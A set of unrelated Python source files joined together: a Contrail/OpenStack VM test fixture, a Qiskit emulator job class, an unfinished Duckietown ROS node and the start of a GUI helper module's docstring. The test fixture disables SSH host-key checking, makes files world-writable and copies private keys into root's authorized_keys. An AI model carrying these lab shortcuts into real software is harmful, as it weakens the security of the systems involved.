self.verify_vm_not_in_setup = (self.verify_vm_not_in_api_server_flag and self.verify_vm_not_in_agent_flag and
self.verify_vm_not_in_control_nodes_flag and
self.verify_vm_not_in_nova_flag and
self.vm_flows_removed_flag)
# Trying a workaround for Bug 452
assert self.verify_vm_not_in_api_server_flag
assert self.verify_vm_not_in_agent_flag
assert self.verify_vm_not_in_control_nodes_flag
assert self.verify_vm_not_in_nova_flag
# end if
else:
self.logger.info('Skipping the deletion of VM %s' %
(self.vm_name))
# end cleanUp
@retry(delay=2, tries=25)
def verify_vm_not_in_nova(self):
result = True
self.verify_vm_not_in_nova_flag = True
for vm_obj in self.vm_objs:
result = result and self.nova_fixture.is_vm_deleted_in_nova_db(
vm_obj, self.inputs.openstack_ip)
self.verify_vm_not_in_nova_flag = self.verify_vm_not_in_nova_flag and result
return result
# end verify_vm_not_in_nova
def tftp_file_to_vm(self, file, vm_ip):
'''Do a scp of the specified file to the specified VM
'''
host = self.inputs.host_data[self.vm_node_ip]
output = ''
try:
self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
with hide('everything'):
with settings(
host_string='%s@%s' % (
host['username'], self.vm_node_ip),
password=host['password'],
warn_only=True, abort_on_prompts=False):
key_file = self.nova_fixture.tmp_key_file
i = 'timeout 20 atftp -p -r %s -l %s %s' % (file,
file, vm_ip)
self.run_cmd_on_vm(cmds=[i])
except Exception, e:
self.logger.exception(
'Exception occured while trying to tftp the file')
# end tftp_file_to_vm
def scp_file_to_vm(self, file, vm_ip, dest_vm_username='ubuntu'):
'''Do a scp of the specified file to the specified VM
'''
host = self.inputs.host_data[self.vm_node_ip]
output = ''
try:
self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
with hide('everything'):
with settings(
host_string='%s@%s' % (
host['username'], self.vm_node_ip),
password=host['password'],
warn_only=True, abort_on_prompts=False):
key_file = self.nova_fixture.tmp_key_file
self.get_rsa_to_vm()
i = 'timeout 20 scp -o StrictHostKeyChecking=no -i id_rsa %s %s@%s:' % (
file, dest_vm_username, vm_ip)
cmd_outputs = self.run_cmd_on_vm(cmds=[i])
self.logger.debug(cmd_outputs)
except Exception, e:
self.logger.exception(
'Exception occured while trying to scp the file ')
# end scp_file_to_vm
def put_pub_key_to_vm(self):
self.logger.debug('Copying public key to VM %s' % (self.vm_name))
self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
auth_file = '.ssh/authorized_keys'
self.run_cmd_on_vm(['mkdir -p ~/.ssh'])
host = self.inputs.host_data[self.vm_node_ip]
with hide('everything'):
with settings(
host_string='%s@%s' % (host['username'], self.vm_node_ip),
password=host['password'],
warn_only=True, abort_on_prompts=False):
key_file = self.nova_fixture.tmp_key_file
fab_put_file_to_vm(host_string='%s@%s' % (
self.vm_username, self.local_ip),
password=self.vm_password,
src='/tmp/id_rsa.pub', dest='/tmp/')
self.run_cmd_on_vm(['cat /tmp/id_rsa.pub >> ~/%s' % (auth_file)])
self.run_cmd_on_vm(['chmod 600 ~/%s' % (auth_file)])
self.run_cmd_on_vm(['cat /tmp/id_rsa.pub >> /root/%s' %
(auth_file)], as_sudo=True)
self.run_cmd_on_vm(['chmod 600 /root/%s' % (auth_file)], as_sudo=True)
def check_file_transfer(self, dest_vm_fixture, mode='scp', size='100'):
'''
Creates a file of "size" bytes and transfers to the VM in dest_vm_fixture using mode scp/tftp
'''
filename = 'testfile'
dest_vm_ip = dest_vm_fixture.vm_ip
# Create file
cmd = 'dd bs=%s count=1 if=/dev/zero of=%s' % (size, filename)
self.run_cmd_on_vm(cmds=[cmd])
# Copy file
if mode == 'scp':
dest_vm_fixture.run_cmd_on_vm(
cmds=['cp -f ~root/.ssh/authorized_keys ~/.ssh/'], as_sudo=True)
self.scp_file_to_vm(filename, vm_ip=dest_vm_ip)
elif mode == 'tftp':
# Create the file on the remote machine so that put can be done
dest_vm_fixture.run_cmd_on_vm(
cmds=['sudo touch /var/lib/tftpboot/%s' % (filename),
'sudo chmod 777 /var/lib/tftpboot/%s' % (filename)])
self.tftp_file_to_vm(filename, vm_ip=dest_vm_fixture.vm_ip)
else:
self.logger.error('No transfer mode specified!!')
return False
self.run_cmd_on_vm(cmds=['sync'])
# Verify if file size is same
if mode == 'scp':
out_dict = dest_vm_fixture.run_cmd_on_vm(
cmds=['ls -l %s' % (filename)])
elif mode == 'tftp':
out_dict = dest_vm_fixture.run_cmd_on_vm(
cmds=['ls -l /var/lib/tftpboot/%s' % (filename)])
if size in out_dict.values()[0]:
self.logger.info('File of size %s is trasferred successfully to \
%s by %s ' % (size, dest_vm_ip, mode))
else:
self.logger.warn('File of size %s is not trasferred fine to %s \
by %s !! Pls check logs' % (size, dest_vm_ip, mode))
return False
return True
# end check_file_transfer
def get_rsa_to_vm(self):
'''Get the rsa file to the VM from the agent
'''
host = self.inputs.host_data[self.vm_node_ip]
output = ''
try:
self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
with hide('everything'):
with settings(
host_string='%s@%s' % (
host['username'], self.vm_node_ip),
password=host['password'],
warn_only=True, abort_on_prompts=False):
key_file = self.nova_fixture.tmp_key_file
fab_put_file_to_vm(host_string='%s@%s' % (
self.vm_username, self.local_ip),
password=self.vm_password,
src=key_file, dest='~/')
self.run_cmd_on_vm(cmds=['chmod 600 id_rsa'])
except Exception, e:
self.logger.exception(
'Exception occured while trying to get the rsa file to the \
VM from the agent')
# end get_rsa_to_vm
def run_cmd_on_vm(self, cmds=[], as_sudo=False):
'''run cmds on VM
'''
self.return_output_cmd_dict = {}
self.return_output_values_list = []
cmdList = cmds
host = self.inputs.host_data[self.vm_node_ip]
output = ''
try:
self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
fab_connections.clear()
with hide('everything'):
with settings(
host_string='%s@%s' % (host['username'], self.vm_node_ip),
password=host['password'],
warn_only=True, abort_on_prompts=False):
key_file = self.nova_fixture.tmp_key_file
for cmd in cmdList:
self.logger.debug('Running Cmd on %s: %s' % (
self.vm_node_ip, cmd))
output = run_fab_cmd_on_node(
host_string='%s@%s' % (
self.vm_username, self.local_ip),
password=self.vm_password,
cmd=cmd,
as_sudo=as_sudo)
self.logger.debug(output)
self.return_output_values_list.append(output)
self.return_output_cmd_dict = dict(
zip(cmdList, self.return_output_values_list))
return self.return_output_cmd_dict
except Exception, e:
self.logger.exception(
'Exception occured while trying ping from VM ')
return self.return_output_cmd_dict
def get_vm_ip_from_vm(self, vn_fq_name=None):
''' Get VM IP from Ifconfig output executed on VM
'''
vm_ip = None
if not vn_fq_name:
vn_fq_name = self.vn_fq_names[0]
cmd = "ifconfig | grep %s" % (self.tap_intf[vn_fq_name]['ip_addr'])
self.run_cmd_on_vm(cmds=[cmd])
output = self.return_output_cmd_dict[cmd]
match = re.search('inet addr:(.+?) Bcast:', output)
if match:
vm_ip = match.group(1)
return vm_ip
# end def
def wait_till_vm_is_up(self):
result = self.verify_vm_launched()
#console_check = self.nova_fixture.wait_till_vm_is_up(self.vm_obj)
#result = result and self.nova_fixture.wait_till_vm_is_up(self.vm_obj)
#if not console_check :
# import pdb; pdb.set_trace()
# self.logger.warn('Console logs didnt give enough info on bootup')
self.vm_obj.get()
result = result and self._gather_details()
result = result and self.wait_for_ssh_on_vm()
if not result :
self.logger.error('Failed to SSH to VM %s' % (self.vm_name))
return result
return True
# end wait_till_vm_is_up
def wait_for_ssh_on_vm(self):
self.logger.info('Waiting to SSH to VM %s, IP %s' % (self.vm_name,
self.vm_ip))
# Need fab files on compute node before talking to VMs
host = self.inputs.host_data[self.vm_node_ip]
with settings(host_string='%s@%s' % (host['username'],
self.vm_node_ip), password=host['password'],
warn_only=True, abort_on_prompts=False):
put('tcutils/fabfile.py', '~/')
# Check if ssh from compute node to VM works(with retries)
cmd = 'fab -u %s -p %s -H %s -D -w --hide status,user,running wait_for_ssh:' % (self.vm_username, self.vm_password, self.local_ip)
output = self.inputs.run_cmd_on_server(self.vm_node_ip, cmd,
self.inputs.host_data[
self.vm_node_ip]['username'],
self.inputs.host_data[self.vm_node_ip]['password'])
output = remove_unwanted_output(output)
if 'True' in output :
self.logger.info('VM %s is ready for SSH connections ' % (
self.vm_name))
return True
else:
self.logger.error('VM %s is NOT ready for SSH connections ' % (
self.vm_name))
return False
# end wait_for_ssh_on_vm
def get_vm_ipv6_addr_from_vm(self, intf='eth0', addr_type='link'):
''' Get VM IPV6 from Ifconfig output executed on VM
'''
vm_ipv6 = None
cmd = "ifconfig %s| awk '/inet6/ {print $3}'" % (intf)
self.run_cmd_on_vm(cmds=[cmd])
if cmd in self.return_output_cmd_dict.keys():
output = self.return_output_cmd_dict[cmd]
if (addr_type == 'link'):
match = re.search('inet6 addr:(.+?) Scope:Link', output)
elif (addr_type == 'global'):
match = re.search('inet6 addr:(.+?) Scope:Global', output)
else:
match = None
if match:
vm_ipv6 = match.group(1)
return vm_ipv6
def get_active_controller(self):
''' Get the active contol node.
'''
active_controller = None
inspect_h = self.agent_inspect[self.vm_node_ip]
agent_xmpp_status = inspect_h.get_vna_xmpp_connection_status()
for entry in agent_xmpp_status:
if entry['cfg_controller'] == 'Yes' \
and entry['state'] == 'Established':
active_controller = entry['controller_ip']
if not active_controller:
self.logger.error('Active controlloer is not found')
return active_controller
def install_pkg(self, pkgname="Traffic"):
pkgsrc = PkgHost(self.inputs.cfgm_ips[0], self.vm_node_ip,
self.inputs.username, self.inputs.password)
self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
key = self.nova_fixture.tmp_key_file
pkgdst = PkgHost(self.local_ip, key=key, user=self.vm_username,
password=self.vm_password)
fab_connections.clear()
assert build_and_install(pkgname, pkgsrc, pkgdst, self.logger)
@retry(delay=2, tries=15)
def verify_vm_flows_removed(self):
cmd = 'flow -l '
result = True
self.vm_flows_removed_flag = True
output = self.inputs.run_cmd_on_server(self.vm_node_ip, cmd,
self.inputs.host_data[
self.vm_node_ip][
'username'],
self.inputs.host_data[self.vm_node_ip]['password'])
if '%s:' % (self.vm_ip) in output:
self.logger.warn(
"One or more flows still present on Compute node after VM delete : %s" % (output))
result = False
else:
self.logger.info("All flows for the VM deleted on Compute node")
self.vm_flows_removed_flag = self.vm_flows_removed_flag and result
return result
# end verify_vm_flows_removed
@retry(delay=3, tries=30)
def _gather_details(self):
self.cs_vmi_objs = {}
self.cs_vmi_obj = {}
self.vm_id = self.vm_objs[0].id
# Figure out the local metadata IP of the VM reachable from host
nova_host = self.inputs.host_data[
self.nova_fixture.get_nova_host_of_vm(self.vm_obj)]
self.vm_node_ip = nova_host['host_ip']
self.vm_node_data_ip = nova_host['host_data_ip']
inspect_h= self.agent_inspect[self.vm_node_ip]
cfgm_ip = self.inputs.cfgm_ips[0]
api_inspect = self.api_s_inspects[cfgm_ip]
self.cs_vmi_objs[cfgm_ip]= api_inspect.get_cs_vmi_of_vm( self.vm_id)
for vmi_obj in self.cs_vmi_objs[cfgm_ip]:
vmi_vn_fq_name= ':'.join(
vmi_obj['virtual-machine-interface']['virtual_network_refs'][0]['to'])
self.cs_vmi_obj[vmi_vn_fq_name] = vmi_obj
for vn_fq_name in self.vn_fq_names:
(domain, project, vn)= vn_fq_name.split(':')
vna_tap_id = inspect_h.get_vna_tap_interface_by_vmi(
vmi_id=self.cs_vmi_obj[vn_fq_name][
'virtual-machine-interface' ]['uuid'])
self.tap_intf[vn_fq_name] = vna_tap_id[0]
self.tap_intf[vn_fq_name]= inspect_h.get_vna_intf_details(
self.tap_intf[vn_fq_name][ 'name' ])[0]
self.local_ips[vn_fq_name] = self.tap_intf[vn_fq_name]['mdata_ip_addr']
if self.local_ips[vn_fq_name] != '0.0.0.0':
if self.ping_vm_from_host(vn_fq_name) or self.ping_vm_from_host( vn_fq_name) :
self.local_ip= self.local_ips[vn_fq_name]
if not self.local_ip:
return False
return True
# end _gather_details
def interface_attach(self, port_id=None, net_id=None, fixed_ip=None):
self.logger.info('Attaching port %s to VM %s' %(port_id, self.vm_obj.name))
return self.vm_obj.interface_attach(port_id, net_id, fixed_ip)
def interface_detach(self, port_id):
self.logger.info('Detaching port %s from VM %s' %(port_id, self.vm_obj.name))
return self.vm_obj.interface_detach(port_id)
# end VMFixture
class VMData(object):
""" Class to store VM related data.
"""
def __init__(self, name, vn_obj, image='ubuntu', project='admin', flavor='m1.tiny'):
self.name = name
self.vn_obj = vn_obj
self.image = image
self.project = project
self.flavor = flavor
class MultipleVMFixture(fixtures.Fixture):
"""
Fixture to handle creation, verification and deletion of multiple VMs.
Deletion of the VM upon exit can be disabled by setting fixtureCleanup= 'no'
in params file. If a VM with the vm_name is already present, it is not
deleted upon exit. To forcefully clean them up, set fixtureCleanup= 'force'
"""
def __init__(self, connections, vms=[], vn_objs=[], image_name='ubuntu',
vm_count_per_vn=2, flavor='contrail_flavor_small', project_name='admin'):
"""
vms : List of dictionaries of VMData objects.
or
vn_objs : List of tuples of VN name and VNfixture.obj returned by the
get_all_fixture method of MultipleVNFixture.
"""
self.connections = connections
self.nova_fixture = self.connections.nova_fixture
self.project_name = project_name
self.vms = vms
self.vm_count = vm_count_per_vn
self.vn_objs = vn_objs
self.flavor = flavor
self.image_name = image_name
self.inputs = self.connections.inputs
self.logger = self.inputs.logger
# end __init__
def create_vms_in_vn(self, name, image, flavor, project, vn_obj):
for c in range(self.vm_count):
vm_name = '%s_vm_%s' % (name, c)
try:
vm_fixture = self.useFixture(VMFixture(image_name=image,
project_name=project, flavor=flavor, connections=self.connections,
vn_obj=vn_obj, vm_name=vm_name))
except Exception, err:
self.logger.error(err)
self.logger.debug(traceback.format_exc())
break
else:
self._vm_fixtures.append((vm_name, vm_fixture))
def setUp(self):
super(MultipleVMFixture, self).setUp()
self._vm_fixtures = []
if self.vms:
for vm in vms:
self.create_vms_in_vn(vm.name, vm.image, vm.flavor, vm.project,
vm.vn_obj)
elif self.vn_objs:
for vn_name, vn_obj in self.vn_objs:
self.create_vms_in_vn(vn_name, self.image_name, self.flavor,
self.project_name, vn_obj)
else:
self.logger.error("One of vms, vn_objs is required.")
def verify_on_setup(self):
# TODO
# Not expected to do verification when self.count > 1
created_vms = len(self._vm_fixtures)
expected_vms = len(self.vms)
if self.vn_objs:
expected_vms = self.vm_count * len(self.vn_objs)
if created_vms != expected_vms:
return False
result = True
for vm_name, vm_fixture in self._vm_fixtures:
result &= vm_fixture.verify_on_setup()
return result
def get_all_fixture(self):
return self._vm_fixtures
|
emulator_runtime_job.py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# Copyright 2021 Dell (www.dell.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dell_runtime.emulation_executor import EmulationExecutor
from typing import Any, Optional, Callable, Dict, Type
import time
import logging
import asyncio
from concurrent import futures
import traceback
import queue
from datetime import datetime
from qiskit.providers.ibmq.runtime.program.result_decoder import ResultDecoder
from urllib.parse import urljoin
import requests
import threading
from datetime import datetime
import json
import socket
logger = logging.getLogger(__name__)
class EmulatorRuntimeJob:
"""Representation of a runtime program execution.
A new ``EmulatorRuntimeJob`` instance is returned when you call
job = provider.runtime.run(...)
"""
def __init__(
self,
job_id,
host,
session: Optional[Type[requests.Session]] = None,
executor: Optional[Type[EmulationExecutor]] = None,
result_decoder: Type[ResultDecoder] = ResultDecoder,
callback: Optional[Callable] = None
) -> None:
"""RuntimeJob constructor.
Args:
"""
self.job_id = job_id
self.host = host
self._sock = None
self.local_port = None
self.executor = executor
self.session = session
self._status = None
self._msgRead = 0
self._imsgs = []
self._finalResults = None
self._kill = False
if not self.host:
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.bind(('localhost', 0))
self.local_port = self._sock.getsockname()[1]
logger.debug(self.local_port)
self._poller = threading.Thread(target=self.local_poll_for_results, args=(callback,))
else:
self._poller = threading.Thread(target=self.remote_poll_for_results,args=(callback,))
self.result_decoder = result_decoder
self._poller.start()
if self.executor:
self.executor._local_port = self.local_port
self.executor.run()
def __del__(self):
self._kill = True
try:
self._poller.join()
except:
logger.debug("poller thread joined")
# self.executor.__del__()
def job_completed(self):
self.status()
return (self._status == "Failed" or self._status == "Completed" or self._status == "Canceled")
def local_poll_for_results(self,callback):
logger.debug(f"starting to listen to port {self.local_port}")
self._sock.listen(1)
self._sock.settimeout(120)
try:
conn, addr = self._sock.accept()
logger.debug(f"accepted client connection from {addr}")
with conn:
while self._finalResults == None and not self._kill and not self.job_completed():
data = conn.recv(16384)
if not data:
break
else:
data_str = data.decode('utf-8')
msgs = data_str.split('\u0004')[:-1]
for msg in msgs:
data_obj = json.loads(msg, cls=self.result_decoder)
# print(f"MESSENGER RECEIVED: {data_obj}")
message = data_obj["message"]
if data_obj['final']:
logger.debug('result: got final result.')
self._finalResults = message
else:
self._imsgs.append(message)
if callback is not None:
callback(message)
self._sock.close()
logger.debug("local thread: exiting")
return
except socket.timeout as e:
logger.debug(e)
def remote_poll_for_results(self, callback):
dcd = self.result_decoder
lastTimestamp = None
stay_alive = True
final_loop = False
while stay_alive:
time.sleep(3)
url = self.getURL('/job/'+ self.job_id +'/results')
if lastTimestamp:
url = self.getURL('/job/'+ self.job_id +'/results/' + str(lastTimestamp))
response = self.session.get(url)
if response.status_code == 204:
logger.debug('result: status 204, no new messages.')
continue
response.raise_for_status()
res_json = json.loads(response.text)
logger.debug(f'got: {res_json}')
messages = res_json["messages"]
logger.debug(f'result: got {messages}')
for msg in messages:
if not lastTimestamp:
lastTimestamp = datetime.fromisoformat(msg['timestamp'])
else:
msgTime = datetime.fromisoformat(msg['timestamp'])
if lastTimestamp < msgTime:
lastTimestamp = msgTime
msg_data = json.loads(msg['data'])
if msg_data['final']:
logger.debug('result: got final result.')
self._finalResults = msg_data['message']
else:
self._imsgs.append(msg_data['message'])
logger.debug("appended message to queue")
if callback is not None:
logger.debug('Callback is here')
callback(msg_data['message'])
if final_loop:
stay_alive = False
continue
final_loop = not (self._finalResults == None and not self._kill and not self.job_completed())
# logger.debug(f"final: {final_loop}")
# logger.debug(f"results: {self._finalResults}")
# logger.debug(f"kill: {self._kill}")
# logger.debug(f"completed: {self.job_completed()}")
return
def getURL(self, path):
url = urljoin(self.host, path)
logger.debug(f"{url}")
return url
def result(self,
timeout: Optional[float] = None):
if timeout is not None:
stime = time.time()
while self._finalResults == None:
elapsed_time = time.time() - stime
if elapsed_time >= timeout:
self._kill = True
raise Exception('Timeout while waiting for job {}.'.format(self.job_id))
time.sleep(1)
return self._finalResults
def get_unread_messages(self):
if len(self._imsgs) == self._msgRead:
return []
else:
strt = self._msgRead
self._msgRead = len(self._imsgs)
return self._imsgs[strt:]
def cancel(self) -> None:
"""Cancel the job.
"""
self._kill = True
if self.executor:
self.executor.cancel()
return True
url = self.getURL('/job/' + self.job_id + '/cancel')
response = self.session.get(url)
response.raise_for_status()
if response.status_code == 200:
return True
elif response.status_code == 204:
return False
def status(self):
"""Return the status of the job.
Returns:
Status of this job.
Raises:
"""
if self.executor:
return self.executor.get_status()
url = self.getURL('/job/' + self.job_id + '/status')
response = self.session.get(url)
response.raise_for_status()
if response.status_code == 200:
self._status = response.text
return self._status
elif response.status_code == 204:
return None
def wait_for_final_state(
self,
) -> None:
"""Poll the job status until it progresses to a final state such as ``DONE`` or ``ERROR``.
Args:
Raises:
"""
# def stream_results(
# self,
# callback: Callable,
# decoder: Optional[Type[ResultDecoder]] = None
# ) -> None:
# dcd = decoder or self.result_decoder
# isFinal = False
# while not isFinal:
# response = requests.get(self.getURL('/jobs/'+ self.job_id +'/results'))
# response.raise_for_status()
# results = dcd.decode(response.text)
# for result in results:
# callback(result['message'])
# isFinal = result['final']
def cancel_result_streaming(self) -> None:
"""Cancel result streaming."""
def _start_websocket_client(
self,
) -> None:
"""Start websocket client to stream results.
Args:
"""
def _stream_results(
self,
) -> None:
"""Stream interim results.
Args:
"""
def _empty_result_queue(self, result_queue: queue.Queue) -> None:
"""Empty the result queue.
Args:
"""
def job_id(self) -> str:
"""Return a unique ID identifying the job.
Returns:
Job ID.
"""
return self._job_id
#def backend(self) -> Backend:
# """Return the backend where this job was executed.
# Returns:
# Backend used for the job.
# """
# return self._backend
@property
def inputs(self) -> Dict:
"""Job input parameters.
Returns:
Input parameters used in this job.
"""
return self._params
@property
def program_id(self) -> str:
"""Program ID.
Returns:
ID of the program this job is for.
"""
return self._program_id
@property
def creation_date(self) -> Optional[datetime]:
"""Job creation date in local time.
Returns:
The job creation date as a datetime object, in local time, or
``None`` if creation date is not available.
"""
@property
def user_messenger(self):
return self._user_messenger
@user_messenger.setter
def user_messenger(self, messenger):
self._user_messenger = messenger |
face_lulala_alphaduck_back.py | #!/usr/bin/env python
import rospy
import cv2
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import CompressedImage, Image
from duckietown_msgs.msg import Segment, SegmentList, Vector2D
from line_detector.WhiteBalance import *
from visualization_msgs.msg import Marker
from geometry_msgs.msg import Point
import numpy as np
import threading
#from PIL import Image as pimg
#import jpeg4py as jpeg
class FaceLulalaAlphaduckNode(object):
def __init__(self):
self.node_name = "face_lulala_alphaduck"
# Thread lock
self.thread_lock = threading.Lock()
# Constructor of line detector
self.bridge = CvBridge()
self.detector = LineDetector()
self.wb = WhiteBalance()
self.flag_wb_ref = False
# Parameters
self.flag_wb = rospy.get_param('~white_balance')
self.image_size = rospy.get_param('~img_size')
self.top_cutoff = rospy.get_param('~top_cutoff')
self.detector.hsv_white1 = np.array(rospy.get_param('~hsv_white1'))
self.detector.hsv_white2 = np.array(rospy.get_param('~hsv_white2'))
self.detector.hsv_yellow1 = np.array(rospy.get_param('~hsv_yellow1'))
self.detector.hsv_yellow2 = np.array(rospy.get_param('~hsv_yellow2'))
self.detector.hsv_red1 = np.array(rospy.get_param('~hsv_red1'))
self.detector.hsv_red2 = np.array(rospy.get_param('~hsv_red2'))
self.detector.hsv_red3 = np.array(rospy.get_param('~hsv_red3'))
self.detector.hsv_red4 = np.array(rospy.get_param('~hsv_red4'))
self.detector.dilation_kernel_size = rospy.get_param('~dilation_kernel_size')
self.detector.canny_thresholds = rospy.get_param('~canny_thresholds')
self.detector.hough_min_line_length = rospy.get_param('~hough_min_line_length')
self.detector.hough_max_line_gap = rospy.get_param('~hough_max_line_gap')
self.detector.hough_threshold = rospy.get_param('~hough_threshold')
# Publishers
self.pub_car_cmd = rospy.Publisher("~car_cmd", Twist2DStamped, queue_size=1)
# Verbose option
self.verbose = rospy.get_param('~verbose')
if self.verbose:
self.toc_pre = rospy.get_time()
# Subscribers
self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
rospy.loginfo("[%s] Initialized." %(self.node_name))
def cbImage(self,image_msg):
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
# Returns rightaway
def processImage(self,image_msg):
if not self.thread_lock.acquire(False):
# Return immediately if the thread is locked
return
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency received = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# time_start = rospy.Time.now()
# time_start = event.last_real
# msg_age = time_start - image_msg.header.stamp
# rospy.loginfo("[LineDetector] image age: %s" %msg_age.to_sec())
# Decode from compressed image
# with OpenCV
image_cv = cv2.imdecode(np.fromstring(image_msg.data, np.uint8), cv2.CV_LOAD_IMAGE_COLOR)
# with PIL Image
# image_cv = jpeg.JPEG(np.fromstring(image_msg.data, np.uint8)).decode()
# with libjpeg-turbo
# Convert from uncompressed image message
# image_cv = self.bridge.imgmsg_to_cv2(image_msg, "bgr8")
# Verbose
if self.verbose:
self.tic = rospy.get_time()
rospy.loginfo("[%s] Latency image decompressed = %.3f ms" %(self.node_name, (self.tic-image_msg.header.stamp.to_sec()) * 1000.0))
# White balancing: set reference image to estimate parameters
if self.flag_wb and (not self.flag_wb_ref):
# set reference image to estimate parameters
self.wb.setRefImg(image_cv)
rospy.loginfo("[%s] White balance: parameters computed." %(self.node_name))
print self.wb.norm_bgr
self.flag_wb_ref = True
# Resize and crop image
hei_original = image_cv.shape[0]
wid_original = image_cv.shape[1]
if self.image_size[0]!=hei_original or self.image_size[1]!=wid_original:
# image_cv = cv2.GaussianBlur(image_cv, (5,5), 2)
image_cv = cv2.resize(image_cv, (self.image_size[1], self.image_size[0]), interpolation=cv2.INTER_NEAREST)
image_cv = image_cv[self.top_cutoff:,:,:]
# White balancing
if self.flag_wb and self.flag_wb_ref:
self.wb.correctImg(image_cv)
# Set the image to be detected
self.detector.setImage(image_cv)
# Detect lines and normals
# lines_white, normals_white = self.detector.detectLines('white')
# lines_yellow, normals_yellow = self.detector.detectLines('yellow')
# lines_red, normals_red = self.detector.detectLines('red')
# Draw lines and normals
# self.detector.drawLines(lines_white, (0,0,0))
# self.detector.drawLines(lines_yellow, (255,0,0))
# self.detector.drawLines(lines_red, (0,255,0))
#self.detector.drawNormals(lines_white, normals_white)
#self.detector.drawNormals(lines_yellow, normals_yellow)
#self.detector.drawNormals(lines_red, normals_red)
# SegmentList constructor
# segmentList = SegmentList()
# segmentList.header.stamp = image_msg.header.stamp
# Convert to normalized pixel coordinates, and add segments to segmentList
# arr_cutoff = np.array((0, self.top_cutoff, 0, self.top_cutoff))
# arr_ratio = np.array((1./self.image_size[1], 1./self.image_size[0], 1./self.image_size[1], 1./self.image_size[0]))
# if len(lines_white)>0:
# lines_normalized_white = ((lines_white + arr_cutoff) * arr_ratio)
# segmentList.segments.extend(self.toSegmentMsg(lines_normalized_white, normals_white, Segment.WHITE))
# if len(lines_yellow)>0:
# lines_normalized_yellow = ((lines_yellow + arr_cutoff) * arr_ratio)
# segmentList.segments.extend(self.toSegmentMsg(lines_normalized_yellow, normals_yellow, Segment.YELLOW))
# if len(lines_red)>0:
# lines_normalized_red = ((lines_red + arr_cutoff) * arr_ratio)
# segmentList.segments.extend(self.toSegmentMsg(lines_normalized_red, normals_red, Segment.RED))
"""
# Verbose
if self.verbose:
self.toc = rospy.get_time()
rospy.loginfo("[%s] Image processing time: %.3f ms" %(self.node_name, (self.toc-self.tic)*1000.0))
rospy.loginfo("[%s] Number of white segments = %d" %(self.node_name, len(lines_white)))
rospy.loginfo("[%s] number of yellow segments = %d" %(self.node_name, len(lines_yellow)))
rospy.loginfo("[%s] number of red segments = %d" %(self.node_name, len(lines_red)))
self.toc_pre = self.toc
# Publish segmentList
self.pub_lines.publish(segmentList)
# time_spent = rospy.Time.now() - time_start
# rospy.loginfo("[LineDetectorNode] Spent: %s" %(time_spent.to_sec()))
"""
# Publish the frame with lines
# image_msg_out = self.bridge.cv2_to_imgmsg(self.detector.getImage(), "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image.publish(image_msg_out)
# time_spent = rospy.Time.now() - time_start
# rospy.loginfo("[LineDetectorNode] Spent on img: %s" %(time_spent.to_sec()))
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency sent = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# Release the thread lock
self.thread_lock.release()
def onShutdown(self):
rospy.loginfo("[LineDetectorNode] Shutdown.")
"""
def toSegmentMsg(self, lines, normals, color):
segmentMsgList = []
for x1,y1,x2,y2,norm_x,norm_y in np.hstack((lines,normals)):
segment = Segment()
segment.color = color
segment.pixels_normalized[0].x = x1
segment.pixels_normalized[0].y = y1
segment.pixels_normalized[1].x = x2
segment.pixels_normalized[1].y = y2
segment.normal.x = norm_x
segment.normal.y = norm_y
segmentMsgList.append(segment)
return segmentMsgList
"""
if __name__ == '__main__':
rospy.init_node('face_lulala_alphaduck',anonymous=False)
face_lulala_alphaduck_node = FaceLulalaAlphaduckNode()
rospy.on_shutdown(face_lulala_alphaduck_node.onShutdown)
rospy.spin()
|
__init__.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Félix Chénier
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Limited Interaction
===================
Provides simple, backend-independant GUI tools for limited user interaction.
This module provides simple GUI tools that run in their own process, so that
it cannot conflict with the current running event loop. If Matplotlib is
imported, it updates its event loop in background while waiting for user
action.
Additional parameters
---------------------
All functions except `get_folder` and `get_filename` accept these
parameters in addition to their own parameters:
title
Title of the dialog window.
icon
Can be either None, a str from ['alert', 'clock', 'cloud', 'error',
'find', 'gear', 'info','light', 'lock', 'question', 'warning'] or a
or a tuple of png files: (path_to_image_in_dialog.png,
path_to_dock_icon.png)
left
Distance between the monitor's left edge and the window's left edge in
pixels. Parameters 'left' and 'right' cannot be used together.
right
Distance between the monitor's right edge and the window's right edge in
pixels. Parameters 'left' and 'right' cannot be used together.
top
Distance between the monitor's top edge and the window's top edge in
pixels. Parameters 'top' and 'bottom' cannot be used together.
bottom
Distance between the monitor's bottom edge and the window's bottom edge in
pixels. Parameters 'top' and 'bottom' cannot be used together.
min_width
